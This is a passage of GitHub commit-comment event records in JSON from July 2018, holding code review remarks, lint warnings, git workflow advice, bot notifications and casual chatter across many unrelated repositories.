staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:21:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  mutate(  #idee is om onderstaande code te wissen zodra de rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:52:3:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L52) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:53:3:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L53) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/9711d8657108344f74e09345f6976898a54da6d6/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-26T15:44:24Z"}
{"id":"8023581733","type":"CommitCommentEvent","actor":{"login":"shinoi2"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29845968,"position":null,"line":null,"path":null,"commit_id":"5f480e4f3a157f01a7a57a7fb8c7aa230087aecb","created_at":"2018-07-26T15:44:34Z","updated_at":"2018-07-26T15:44:34Z","author_association":"OWNER","body":"Servant of Yogg-Saron will cast shifting scroll, but nothing will happen.\r\n![sample](http://img.ngacn.cc/attachments/mon_201712/25/dyQ5-e3l3XiZ4vT3cS1jl-v9.jpg.medium.jpg)"}},"created_at":"2018-07-26T15:44:34Z"}
{"id":"8023581754","type":"CommitCommentEvent","actor":{"login":"ad3n"},"repo":{"name":"nafiesl/free-pmo"},"payload":{"comment":{"id":29845969,"position":31,"line":68,"path":"app/Http/Controllers/Invoices/ItemsController.php","commit_id":"8ba3e9f79327d88770dd1dffa9dd10a96c7277d8","created_at":"2018-07-26T15:44:34Z","updated_at":"2018-07-26T15:44:34Z","author_association":"NONE","body":"sama juga... ga float?"}},"created_at":"2018-07-26T15:44:34Z"}
{"id":"8023585234","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29845975,"position":null,"line":null,"path":null,"commit_id":"10c44b91e3154ee2a2c106b2388f4e2742bec104","created_at":"2018-07-26T15:45:07Z","updated_at":"2018-07-26T15:45:07Z","author_association":"NONE","body":"But you overlooked that the most moves are legal. their were already checked for pseudo legal in movepicker so here for the move is only checked that it not leave the check in king which almost is true (except if in check). But its important to fetch as early as possible because memory load is the bottleneck. So its a tradeoff between earlier fetch against seldom unused fetch result. Which gives the better speed can only determined by measurement. \r\n\r\nI approve but this test can only show if your version is slower aka the test failed. If this passes a speed comparison should be done."}},"created_at":"2018-07-26T15:45:07Z"}
{"id":"8023587976","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29845984,"position":null,"line":null,"path":null,"commit_id":"ad23c9ef2357081c0c764016638776e60bb210ad","created_at":"2018-07-26T15:45:29Z","updated_at":"2018-07-26T15:45:29Z","author_association":"OWNER","body":"Kile i will actually cry, don't tempt me."}},"created_at":"2018-07-26T15:45:29Z"}
{"id":"8023588620","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29845987,"position":29,"line":26,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/OAuth2TokenValidatorResult.java","commit_id":"2ac05860658e81f01a3d73e3d07d17f24b7b7a19","created_at":"2018-07-26T15:45:35Z","updated_at":"2018-07-26T15:45:35Z","author_association":"OWNER","body":"I've thought about adding two static methods here:\r\n\r\n```java\r\npublic static <E extends OAuth2Error> OAuth2TokenValidatorResult<E> success() {\r\n    return SUCCESS;\r\n}\r\n\r\npublic static <E extends OAuth2Error> OAuth2TokenValidatorResult<E> error(E error) {\r\n    return new OAuth2TokenValidatorResult.Builder<E>().addDetail(error).build();\r\n}\r\n```"}},"created_at":"2018-07-26T15:45:35Z"}
{"id":"8023590936","type":"CommitCommentEvent","actor":{"login":"sp193"},"repo":{"name":"Jay-Jay-OPL/OPL-Daily-Builds"},"payload":{"comment":{"id":29845989,"position":null,"line":null,"path":null,"commit_id":"16e56f41900992eb5b6a65fc522528961e636038","created_at":"2018-07-26T15:45:55Z","updated_at":"2018-07-26T15:45:55Z","author_association":"NONE","body":"Personally, I found the Windows GUI comfusing. Even though I am a Windows user. LOL\r\nSomehow, the interface was just unintuitive and restrictive (could not find some functions that the command-line tool offered).\r\n\r\nWhenever you get a conflict, it just means that the version-control system (Git) could not automatically merge your work.\r\nSo it'll tell you that you have files with unmerged content, marked out with those arrows. You just need to edit those files and to commit the final result (git add all your conflicted files, and then do git commit -a). The markers can be removed, as they are there to indicate to the human what the conflicted regions are.\r\n\r\nBranches are for you to try out new things, usually to be merged into master at some point. Master is also a branch (hence why all repositories have at least 1),which should have stable commits.\r\nIMO it is okay to just keep your commits in master.\r\n\r\nI realized that the Github website makes it easy to make pull requests, but the system is perhaps designed to work like this:\r\n\r\n1. Fork the project .\r\n2. From master, you create a branch (git checkout -b new_branch_name). The branch will have the commits of master.\r\n3. You commit all changes to the branch, as usual. For the first time you push to the remote end, you need to set up the branch upstream (git push origin new_branch_name -u). Subsequently, a normal git push would do.\r\n4. Github will identify all new branches are potential candidates for pull requests, which you can initiate with 1 click.\r\n5. Make pull request.\r\n6. Commits are merged when pull request is approved.\r\n7. Branch can be deleted.\r\n\r\nWhen somebody accepts a pull request, the commits within the pull request are merged into master. You can then update the master branch of your fork by doing:\r\n``git pull https://github.com/url_to_repository\r\nWhenever you want to make a new pull request, you create a new branch."}},"created_at":"2018-07-26T15:45:55Z"}
{"id":"8023596519","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"iweiss/wildfly"},"payload":{"comment":{"id":29846011,"position":37,"line":149,"path":"jsf/subsystem/src/main/java/org/jboss/as/jsf/deployment/JSFDependencyProcessor.java","commit_id":"343d4cc3bac704746f9a43170a1e28a96228d9f1","created_at":"2018-07-26T15:46:50Z","updated_at":"2018-07-26T15:46:50Z","author_association":"NONE","body":"Should the following line be added here?\r\n\r\n```jsfInjectionDependency.addImportFilter(PathFilters.is(\"META-INF/1.2/faces-config.xml\"), false);```"}},"created_at":"2018-07-26T15:46:50Z"}
{"id":"8023597408","type":"CommitCommentEvent","actor":{"login":"kaikecarlos"},"repo":{"name":"kaikecarlos/BetterDiscordApp"},"payload":{"comment":{"id":29846013,"position":null,"line":null,"path":null,"commit_id":"1808d0eed00dea306bbd811b781a19318b01a9c6","created_at":"2018-07-26T15:47:00Z","updated_at":"2018-07-26T15:47:00Z","author_association":"OWNER","body":"TRASH OF SHIT IS MINIFER\r\nI LOVE YOU RAUENZI"}},"created_at":"2018-07-26T15:47:00Z"}
{"id":"8023606774","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"iweiss/wildfly"},"payload":{"comment":{"id":29846037,"position":3,"line":3,"path":"jsf/injection/src/main/java/org/jboss/as/jsf/injection/weld/legacy/ForwardingApplication.java","commit_id":"343d4cc3bac704746f9a43170a1e28a96228d9f1","created_at":"2018-07-26T15:48:35Z","updated_at":"2018-07-26T15:48:35Z","author_association":"NONE","body":"Just a very minor nit, I wonder if these copyright headers should be updated since these are part of a new package."}},"created_at":"2018-07-26T15:48:35Z"}
{"id":"8023614715","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29846057,"position":null,"line":null,"path":null,"commit_id":"ea6b1ac441bdcac020ed8c387a826aa6234a9779","created_at":"2018-07-26T15:49:54Z","updated_at":"2018-07-26T15:49:54Z","author_association":"MEMBER","body":"ping @silverwind "}},"created_at":"2018-07-26T15:49:54Z"}
{"id":"8023615767","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"TheNetworg/MySqlConnector"},"payload":{"comment":{"id":29846059,"position":7,"line":7,"path":"src/MySqlConnector/MySql.Data.MySqlClient/MySqlCertificateStoreLocation.cs","commit_id":"559f2f450c9cbc585baab1529511a114eda18430","created_at":"2018-07-26T15:50:05Z","updated_at":"2018-07-26T15:50:05Z","author_association":"NONE","body":"This namespace should just be `MySql.Data.MySqlClient` (for the public types); then the `using MySqlConnector.MySql.Data.MySqlClient;` directives can be removed."}},"created_at":"2018-07-26T15:50:05Z"}
{"id":"8023616928","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29846061,"position":27,"line":143,"path":"main/course_info/infocours.php","commit_id":"834622f8f6943803a13578504ef732ececa9a3f9","created_at":"2018-07-26T15:50:16Z","updated_at":"2018-07-26T15:50:16Z","author_association":"MEMBER","body":"https://github.com/chamilo/chamilo-lms/commit/37b00ec534735632ea2cecdee858c84eef426b2e and https://github.com/chamilo/chamilo-lms/commit/51206c13ff81d44860d613a4aea19f94e218f108 fix the issue."}},"created_at":"2018-07-26T15:50:16Z"}
{"id":"8023617232","type":"CommitCommentEvent","actor":{"login":"simarssidhu"},"repo":{"name":"simarssidhu/Pi-Approximation"},"payload":{"comment":{"id":29846064,"position":null,"line":null,"path":null,"commit_id":"b17a4df1eb5c5bac1004514e51eef7ff7da19ca0","created_at":"2018-07-26T15:50:19Z","updated_at":"2018-07-26T15:50:19Z","author_association":"OWNER","body":"Updated comments to fix errors."}},"created_at":"2018-07-26T15:50:19Z"}
{"id":"8023621949","type":"CommitCommentEvent","actor":{"login":"hajekj"},"repo":{"name":"TheNetworg/MySqlConnector"},"payload":{"comment":{"id":29846075,"position":7,"line":7,"path":"src/MySqlConnector/MySql.Data.MySqlClient/MySqlCertificateStoreLocation.cs","commit_id":"559f2f450c9cbc585baab1529511a114eda18430","created_at":"2018-07-26T15:51:04Z","updated_at":"2018-07-26T15:51:04Z","author_association":"MEMBER","body":"Noticed, will be fixed with next commit. This is just initial work on it."}},"created_at":"2018-07-26T15:51:04Z"}
{"id":"8023622240","type":"CommitCommentEvent","actor":{"login":"HiImDivinity"},"repo":{"name":"HiImDivinity/LogSearchAndConcat"},"payload":{"comment":{"id":29846077,"position":null,"line":null,"path":null,"commit_id":"ceeca63c835319656c695189bc7206733657e2ad","created_at":"2018-07-26T15:51:08Z","updated_at":"2018-07-26T15:51:08Z","author_association":"OWNER","body":"Ready for release v1.0.1"}},"created_at":"2018-07-26T15:51:08Z"}
{"id":"8023635648","type":"CommitCommentEvent","actor":{"login":"pierre-emmanuelJ"},"repo":{"name":"exoscale/egoscale"},"payload":{"comment":{"id":29846098,"position":26,"line":407,"path":"cmd/exo/cmd/config.go","commit_id":"a16ec2d861851180f6bcf29287add248918bb08f","created_at":"2018-07-26T15:53:21Z","updated_at":"2018-07-26T15:53:21Z","author_association":"MEMBER","body":"https://github.com/exoscale/egoscale/commit/e87f656f69a34af13cd6e2f9f26aad7345aa0fa3"}},"created_at":"2018-07-26T15:53:21Z"}
{"id":"8023637205","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29846101,"position":null,"line":null,"path":null,"commit_id":"ea6b1ac441bdcac020ed8c387a826aa6234a9779","created_at":"2018-07-26T15:53:36Z","updated_at":"2018-07-26T15:53:36Z","author_association":"MEMBER","body":"Go for it."}},"created_at":"2018-07-26T15:53:36Z"}
{"id":"8023642551","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29846115,"position":null,"line":null,"path":null,"commit_id":"0b7a8fad0493cebdd80fb1156ad7d00b40667b88","created_at":"2018-07-26T15:54:31Z","updated_at":"2018-07-26T15:54:31Z","author_association":"COLLABORATOR","body":"@smiths Is the `return` statement the correct implementation?"}},"created_at":"2018-07-26T15:54:31Z"}
{"id":"8023642566","type":"CommitCommentEvent","actor":{"login":"nichcream"},"repo":{"name":"nichcream/android_device_xiaomi_land"},"payload":{"comment":{"id":29846116,"position":null,"line":null,"path":null,"commit_id":"10c192abfa0cf773c13444df292373e8a8d0cb81","created_at":"2018-07-26T15:54:31Z","updated_at":"2018-07-26T15:54:31Z","author_association":"OWNER","body":"does seem to be broken on hal3 api1, but works on api2. but it's definitely got nothing to do with this commit and probably been existent for a while."}},"created_at":"2018-07-26T15:54:31Z"}
{"id":"8023644647","type":"CommitCommentEvent","actor":{"login":"joshcooper"},"repo":{"name":"puppetlabs/beaker"},"payload":{"comment":{"id":29846119,"position":16,"line":573,"path":"lib/beaker/dsl/helpers/host_helpers.rb","commit_id":"6fa2744a5dec68b694657aab86f4884e7e21bd6b","created_at":"2018-07-26T15:54:52Z","updated_at":"2018-07-26T15:54:52Z","author_association":"MEMBER","body":"Is this a breaking change?"}},"created_at":"2018-07-26T15:54:52Z"}
{"id":"8023651495","type":"CommitCommentEvent","actor":{"login":"MCdirtyjob"},"repo":{"name":"MCdirtyjob/cts-course-dj"},"payload":{"comment":{"id":29846139,"position":null,"line":null,"path":null,"commit_id":"f0b716ffb99f50094572b39f0ec44afd0f570cad","created_at":"2018-07-26T15:55:59Z","updated_at":"2018-07-26T15:55:59Z","author_association":"OWNER","body":"Messed up on like 42 did not catch it. That's all that was changed and now it works. "}},"created_at":"2018-07-26T15:55:59Z"}
{"id":"8023654331","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29846143,"position":null,"line":null,"path":null,"commit_id":"8ae7d06509eb532409841b49bcd60a8da7877818","created_at":"2018-07-26T15:56:26Z","updated_at":"2018-07-26T15:56:26Z","author_association":"COLLABORATOR","body":"Puzzle `860-c0f3bfe5` disappeared from [`src/main/java/com/zerocracy/pmo/Speed.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/Speed.java), that's why I closed #1381. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-26T15:56:26Z"}
{"id":"8023655450","type":"CommitCommentEvent","actor":{"login":"naverinosquirrelbeater"},"repo":{"name":"naverinosquirrelbeater/squirrelbeater"},"payload":{"comment":{"id":29846147,"position":null,"line":null,"path":null,"commit_id":"ec51ea3927278501dfc35ebea7b0b155159c9cd0","created_at":"2018-07-26T15:56:37Z","updated_at":"2018-07-26T15:56:37Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-26T15:56:37Z"}
{"id":"8023655498","type":"CommitCommentEvent","actor":{"login":"horsho2"},"repo":{"name":"ekidane/WildbookFlickrBias"},"payload":{"comment":{"id":29846148,"position":null,"line":null,"path":null,"commit_id":"16e2b2b9c31b2ca2083b9050ce4c8e2943d41bd2","created_at":"2018-07-26T15:56:37Z","updated_at":"2018-07-26T15:56:37Z","author_association":"COLLABORATOR","body":"Took 1 hour and 6 minutes."}},"created_at":"2018-07-26T15:56:37Z"}
{"id":"8023656138","type":"CommitCommentEvent","actor":{"login":"gpleiss"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29846149,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-26T15:56:44Z","updated_at":"2018-07-26T15:56:44Z","author_association":"COLLABORATOR","body":"@Balandat hmm I'll take a look later today"}},"created_at":"2018-07-26T15:56:44Z"}
{"id":"8023656418","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29846151,"position":null,"line":null,"path":null,"commit_id":"8ae7d06509eb532409841b49bcd60a8da7877818","created_at":"2018-07-26T15:56:47Z","updated_at":"2018-07-26T15:56:47Z","author_association":"COLLABORATOR","body":"Puzzle `1381-932a555e` discovered in   [`src/test/resources/com/zerocracy/bundles/add_speed_bonus/_after.groovy`](  https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/add_speed_bonus/_after.groovy)   and submitted as #1483. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-26T15:56:47Z"}
{"id":"8023657320","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29846154,"position":null,"line":null,"path":null,"commit_id":"ea6b1ac441bdcac020ed8c387a826aa6234a9779","created_at":"2018-07-26T15:56:57Z","updated_at":"2018-07-26T15:56:57Z","author_association":"MEMBER","body":"> Go for it.\r\n\r\ndid you say remove all selectors? OK\r\n\r\nJoke :) Its a yoke..."}},"created_at":"2018-07-26T15:56:57Z"}
{"id":"8023657545","type":"CommitCommentEvent","actor":{"login":"naverinosquirrelbeater"},"repo":{"name":"naverinosquirrelbeater/squirrelbeater"},"payload":{"comment":{"id":29846155,"position":null,"line":null,"path":null,"commit_id":"ec51ea3927278501dfc35ebea7b0b155159c9cd0","created_at":"2018-07-26T15:57:00Z","updated_at":"2018-07-26T15:57:00Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-26T15:57:00Z"}
{"id":"8023659255","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29846158,"position":null,"line":null,"path":null,"commit_id":"8ae7d06509eb532409841b49bcd60a8da7877818","created_at":"2018-07-26T15:57:17Z","updated_at":"2018-07-26T15:57:17Z","author_association":"COLLABORATOR","body":"Puzzle `1381-6fac770c` discovered in   [`src/main/groovy/com/zerocracy/stk/pm/in/orders/finish_order.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/in/orders/finish_order.groovy)   and submitted as #1484. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-26T15:57:17Z"}
{"id":"8023661886","type":"CommitCommentEvent","actor":{"login":"ztlpn"},"repo":{"name":"yandex/ClickHouse"},"payload":{"comment":{"id":29846164,"position":null,"line":null,"path":null,"commit_id":"02946d2bc182be7339444a9a0aee22a14b33643c","created_at":"2018-07-26T15:57:43Z","updated_at":"2018-07-26T15:57:43Z","author_association":"CONTRIBUTOR","body":"@amosbird I've reverted your commit because I feel that using a third-party container image that messes with /etc/resolv.conf of the host system is a very bad solution.\r\n\r\nAlternative solutions:\r\n1. query for kafka ip address using docker API and then use it.\r\n2. or, if it is not possible (is there a discovery phase in kafka protocol where it advertises the hostnames of the brokers?), run the producer inside the container (the same container as server, or its own)."}},"created_at":"2018-07-26T15:57:43Z"}
{"id":"8023662910","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29846166,"position":null,"line":null,"path":null,"commit_id":"ea6b1ac441bdcac020ed8c387a826aa6234a9779","created_at":"2018-07-26T15:57:54Z","updated_at":"2018-07-26T15:57:54Z","author_association":"MEMBER","body":"<img title=\":_ onion_head_scared_to_death :\" src=\"https://cloud.githubusercontent.com/assets/136959/13371679/b8583b12-dcf1-11e5-946e-98a993508ecc.gif\"> "}},"created_at":"2018-07-26T15:57:54Z"}
{"id":"8023663400","type":"CommitCommentEvent","actor":{"login":"MalcolmCurrie"},"repo":{"name":"Starlink/ORAC-DR"},"payload":{"comment":{"id":29846169,"position":null,"line":null,"path":null,"commit_id":"27031a817fd12219f7f9b8a673fa8b23d22d7a86","created_at":"2018-07-26T15:57:59Z","updated_at":"2018-07-26T15:57:59Z","author_association":"CONTRIBUTOR","body":"Excellent. I like the ability to have smaller text, preventing line wrapping and showing more\r\nlog text at the same time.  There's still the larger footprint on the screen compared with\r\nhow the monitor appeared  until a few years ago,  Could the dimensions be under\r\nprogrammatic control, rather than having to adjust the size manually?"}},"created_at":"2018-07-26T15:57:59Z"}
{"id":"8023663824","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"HybridDog/simple_robots"},"payload":{"comment":{"id":29846173,"position":null,"line":null,"path":null,"commit_id":"114df74f1981adaccb9e8c80e819b97da5f1e7ea","created_at":"2018-07-26T15:58:03Z","updated_at":"2018-07-26T15:58:03Z","author_association":"OWNER","body":"100010010101000001001110010001110000110100001010000110100000101000000000000000000000000000001101010010010100100001000100010100100000000000000000000000000001000000000000000000000000000000010000000000010000001100000000000000000000000000100101001111010110110100100010000000000000000000000000000001100101000001001100010101000100010100000000000000000000000011111111111111110000000010001000110110110111000001010000000000000000000000000000001101100100100101000100010000010101010000001000000111010110001111111100110011111100000000111000111011110010100101100011100011110011000111100011000000100111100111000110010011010001011100011001111101110011000110000010110100001011111101001110010001101010000011111000111000010010001110001100111101110001001100011000110011111010111101100000011111001010110011000010111110001011101110000101111100011011001100001000011000110111101100000101000000001011000000111000000100100110000100110101110111000101100000110111000000000000000000000000000000000100100101000101010011100100010010101110010000100110000010000010"}},"created_at":"2018-07-26T15:58:03Z"}
{"id":"8023667665","type":"CommitCommentEvent","actor":{"login":"albandescottes"},"repo":{"name":"JeffreyGoncalves/OldAvatar"},"payload":{"comment":{"id":29846188,"position":null,"line":null,"path":null,"commit_id":"07fd36361b52daa3531305fa014f203eb5e027ce","created_at":"2018-07-26T15:58:42Z","updated_at":"2018-07-26T15:58:42Z","author_association":"COLLABORATOR","body":"Great job guy, thank you for the credits, it was easy for me you know"}},"created_at":"2018-07-26T15:58:42Z"}
{"id":"8023670312","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29846195,"position":null,"line":null,"path":null,"commit_id":"2901691e8766d7a22102e77e27a6dfb2c52ef9ae","created_at":"2018-07-26T15:59:09Z","updated_at":"2018-07-26T15:59:09Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/approve-topics-in-specific-category/41099/19\n"}},"created_at":"2018-07-26T15:59:09Z"}
{"id":"8023670858","type":"CommitCommentEvent","actor":{"login":"josimarsilva"},"repo":{"name":"josimarsilva/pylith"},"payload":{"comment":{"id":29846196,"position":23,"line":1027,"path":"libsrc/pylith/fekernels/IsotropicLinearPoroelasticityPlaneStrain.cc","commit_id":"4b23386f437f6131b8391fd86a6d0b2fbaf01b7a","created_at":"2018-07-26T15:59:15Z","updated_at":"2018-07-26T15:59:15Z","author_association":"OWNER","body":"I don't understand why the biotCoefficient sign was changed. This seems inconsistent with equation 63 for the formulation. Could you check ?"}},"created_at":"2018-07-26T15:59:15Z"}
{"id":"8023672459","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29846199,"position":null,"line":null,"path":null,"commit_id":"2901691e8766d7a22102e77e27a6dfb2c52ef9ae","created_at":"2018-07-26T15:59:31Z","updated_at":"2018-07-26T15:59:31Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/all-topics-in-a-category-should-be-confirmed-before-publication/66800/20\n"}},"created_at":"2018-07-26T15:59:31Z"}
{"id":"8023677383","type":"CommitCommentEvent","actor":{"login":"brlavon14"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29846217,"position":2,"line":2,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-26T16:00:19Z","updated_at":"2018-07-26T16:00:19Z","author_association":"NONE","body":"I DIDN'T KNOW THIS MODULAR OPERATOR EXISTED!!!! THIS IS GAME CHANGING"}},"created_at":"2018-07-26T16:00:19Z"}
{"id":"8023677806","type":"CommitCommentEvent","actor":{"login":"resoai"},"repo":{"name":"NolanBecker/TileBoard"},"payload":{"comment":{"id":29846220,"position":null,"line":null,"path":null,"commit_id":"77ccdb204786ebb8851a648ee3f4602e78db2ce6","created_at":"2018-07-26T16:00:22Z","updated_at":"2018-07-26T16:00:22Z","author_association":"NONE","body":"Publishing the address of your HA along with the password in plain text. What can possibly go wrong?"}},"created_at":"2018-07-26T16:00:22Z"}
{"id":"8023677969","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"the-j0k3r/GitHub-Community-Dark"},"payload":{"comment":{"id":29846221,"position":null,"line":null,"path":null,"commit_id":"82e6e5d7881a3631271081c58f790ba882894fb7","created_at":"2018-07-26T16:00:23Z","updated_at":"2018-07-26T16:00:23Z","author_association":"NONE","body":"I tried using perfectionist - the program that wraps the lines to 80 characters - on the user.css file, but it chokes... I think it's because of the syntax highlight themes added to the meta-data. It's trying to clean that up, or something."}},"created_at":"2018-07-26T16:00:23Z"}
{"id":"8023682815","type":"CommitCommentEvent","actor":{"login":"Ela-Boska"},"repo":{"name":"Ela-Boska/Q-Learning"},"payload":{"comment":{"id":29846232,"position":null,"line":null,"path":null,"commit_id":"22920ac3e2b4e0a5639332f4c54da4e7d0cf95d3","created_at":"2018-07-26T16:01:11Z","updated_at":"2018-07-26T16:01:11Z","author_association":"OWNER","body":"The result are not stable. In most occasions, the model performs badly, average steps are about 8 steps. Some times if the weights are initialized properly, The model will performs much better. But it's still unstable while testing. Sometimes it holds on for 200 steps, sometimes 20 steps."}},"created_at":"2018-07-26T16:01:11Z"}
{"id":"8023683726","type":"CommitCommentEvent","actor":{"login":"Murllin"},"repo":{"name":"TorchAPI/Essentials"},"payload":{"comment":{"id":29846234,"position":null,"line":null,"path":null,"commit_id":"a8df3a35183db64df74f9d972ee39aae04342c34","created_at":"2018-07-26T16:01:20Z","updated_at":"2018-07-26T16:01:20Z","author_association":"NONE","body":"I testes this last night. It did fix the \"!voxels reset planets\" command but the commands to reset all and cleanup asteroids does not return any results."}},"created_at":"2018-07-26T16:01:20Z"}
{"id":"8023693572","type":"CommitCommentEvent","actor":{"login":"ansegundo"},"repo":{"name":"ansegundo/pytorch-esn"},"payload":{"comment":{"id":29846253,"position":null,"line":null,"path":null,"commit_id":"d1b1f427ff4466aeee3921b50b5f2565a4b7ba65","created_at":"2018-07-26T16:03:04Z","updated_at":"2018-07-26T16:03:04Z","author_association":"OWNER","body":"'aux' cannot be used as a filename on windows because it is a reserved word. "}},"created_at":"2018-07-26T16:03:04Z"}
{"id":"8023696973","type":"CommitCommentEvent","actor":{"login":"vectorhacker"},"repo":{"name":"vectorhacker/pygeteventstore"},"payload":{"comment":{"id":29846266,"position":null,"line":null,"path":null,"commit_id":"b3fa2acb9bb450e037d3100a86021cc6eb2d2e4c","created_at":"2018-07-26T16:03:40Z","updated_at":"2018-07-26T16:03:40Z","author_association":"OWNER","body":"Sure thing man. Thanks for the fix. "}},"created_at":"2018-07-26T16:03:40Z"}
{"id":"8023698876","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29846272,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T16:04:00Z","updated_at":"2018-07-26T16:04:00Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T16:04:00Z"}
{"id":"8023701147","type":"CommitCommentEvent","actor":{"login":"aphillips"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29846278,"position":39,"line":1419,"path":"index.html","commit_id":"9cb4cadeae1975c957875edeb93754d296f3d0c8","created_at":"2018-07-26T16:04:24Z","updated_at":"2018-07-26T16:04:24Z","author_association":"OWNER","body":"well... no. This does *ASCII* case folding *ONLY* so accents do not match across case differences. But this example does need help."}},"created_at":"2018-07-26T16:04:24Z"}
{"id":"8023703557","type":"CommitCommentEvent","actor":{"login":"LadyCailin"},"repo":{"name":"EngineHub/CommandHelper"},"payload":{"comment":{"id":29846286,"position":null,"line":null,"path":null,"commit_id":"c89ca5517d186a2ff7757c727cc17d56cfe4cc22","created_at":"2018-07-26T16:04:50Z","updated_at":"2018-07-26T16:04:50Z","author_association":"CONTRIBUTOR","body":"Haha. Thanks for testing :D"}},"created_at":"2018-07-26T16:04:50Z"}
